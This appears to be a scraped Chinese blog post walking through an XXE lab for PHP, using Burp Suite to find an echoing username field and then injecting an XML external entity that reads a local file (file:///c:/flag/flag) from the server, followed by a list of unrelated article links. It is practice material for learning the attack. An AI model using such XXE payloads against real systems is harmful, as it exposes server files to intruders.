当前位置: 首页 > article >正文

XXE-Lab for PHP

article 2025/1/16 12:46:50

进入环境

出现一个登录页面,输入任意 UserName 和 Psaaword ,使用bp抓取登录数据包

发送到重放器,点击“发送”

只修改 username 的值,查看右边的变化

只修改 password 的值,查看右边的变化

修改 username 和 password 的值,查看右边的变化

发现 username 位置为回显位,我们可以构造xxe攻击,具体操作如下

<?xml version="1.0"?>
<!DOCTYPE user [ 
<!ENTITY xxe SYSTEM "file:///c:/flag/flag" > ]>

<user>
  <username>
    &xxe;
  </username>
  <password>
     1
  </password>
</user>


http://www.kler.cn/a/442615.html

相关文章:

  • 【数模学习笔记】插值算法和拟合算法
  • 【机器学习:十四、TensorFlow与PyTorch的对比分析】
  • abap安装cl_json类
  • 如何使用 Excel 进行多元回归分析?
  • day07_Spark SQL
  • mapbox进阶,添加绘图控件
  • uniapp scroll-view 不生效排查
  • RT-Thread 的时钟管理
  • 3_使用 HTML5 Canvas API (2) --[HTML5 API 学习之旅]
  • Qt之自定义标题栏拓展(十)
  • Tree-of-Counterfactual Prompting for Zero-Shot Stance Detection
  • spring使用rabbitmq当rabbitmq集群节点挂掉 spring rabbitmq怎么保证高可用,rabbitmq网络怎么重新连接
  • 使用Python打造高效的PDF文件管理应用(合并以及分割)
  • Spring Boot 集成 Elasticsearch怎样在不启动es的情况下正常启动服务
  • 【21天学习AI底层概念】day5 机器学习的三大类型不能解决哪些问题?
  • 秒杀抢购场景下实战JVM级别锁与分布式锁
  • 四、网络层:数据平面,《计算机网络(自顶向下方法 第7版,James F.Kurose,Keith W.Ross)》
  • WPF 使用LibVLCSharp.WPF实现视频播放、停止、暂停功能
  • 【排序算法】——插入排序
  • .Net Core注册一个定制任务执行类服务
  • 首屏加载慢问题
  • 备战秋招:2024游戏开发入行与跳槽面试详解
  • 智能移动交通执法方案:易泊车牌识别相机助力精准执法与数据驱动管理
  • HCIA-Access V2.5_3_3_2_VLAN路由配置与实现
  • 机器学习之偏差
  • Shadcn UI 实战:打造可维护的企业级组件库